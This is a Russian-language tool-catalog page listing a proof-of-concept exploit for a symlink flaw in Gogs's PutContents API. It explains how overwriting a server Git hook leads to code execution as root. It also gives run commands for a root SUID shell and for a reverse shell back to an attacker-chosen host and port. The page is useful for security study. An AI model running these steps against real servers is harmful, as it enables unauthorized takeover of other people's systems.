Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-81110-PoC — Некорректная обработка символических ссылок в API PutContents в Gogs позволяет локальное выполнение кода. | Kitploit
Инструменты/GitHubGitHub/bridgeralderson/cve-2025-81110-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubbridgeralderson/cve-2025-81110-poc

CVE-2025-81110-PoC

Некорректная обработка символических ссылок в API PutContents в Gogs позволяет локальное выполнение кода.

Репозиторий
414 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-81110-PoC

Некорректная обработка символических ссылок в API PutContents в Gogs позволяет выполнить локальный код.

Этот репозиторий содержит профессиональный эксплойт для критической уязвимости в Gogs версиях до 0.13.0. Эксплойт использует логическую ошибку, при которой API Gogs не проверяет типы файлов при обновлении содержимого репозитория. Внедряя символическую ссылку, указывающую на серверный Git-хук (pre-receive), аутентифицированный пользователь может перезаписать содержимое хука вредоносным скриптом. Последующие операции Git push запускают выполнение этого скрипта в контексте пользователя, под которым работает служба Gogs (обычно root).

Symlink Injection: Злоумышленник отправляет символическую ссылку, указывающую на внутренние хуки репозитория (например, /root/gogs-repositories//.git/hooks/pre-receive).

API Overwrite: API Gogs позволяет обновить содержимое символической ссылки. Поскольку ОС следует за ссылкой во время операции записи, внутренний Git-хук перезаписывается.

RCE / Privilege Escalation: Последующий Git push запускает хук pre-receive. Если Gogs настроен с RUN_USER = root, злоумышленник получает полный контроль над системой.

Требования

  • Python 3.x
  • Библиотека requests
  • Утилита командной строки git, установленная на машине атакующего

ИСПОЛЬЗОВАНИЕ

Режим SUID

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode suid

После завершения получите root-доступ на цели:

root@kitploit:~
/tmp/rootbash -p

Обратная оболочка

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode rev --lhost <ваш_ip> --lport 4444

Справочник аргументов

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного аудита безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом на системах, которые вам принадлежат или на тестирование которых у вас есть явное разрешение.

Скачать инструмент
АргументОбязателенОписание
--urlДаБазовый URL экземпляра Gogs (например, http://127.0.0.1:3001).
--userДаДействительное имя пользователя для аутентификации.
--passДаДействительный пароль для указанного пользователя.
--modeНетРежим эксплойта: suid (создаёт /tmp/rootbash) или rev (обратная оболочка).
--lhostНетЛокальный IP-адрес для обратного вызова обратной оболочки.
--lportНетЛокальный порт для прослушивателя обратной оболочки.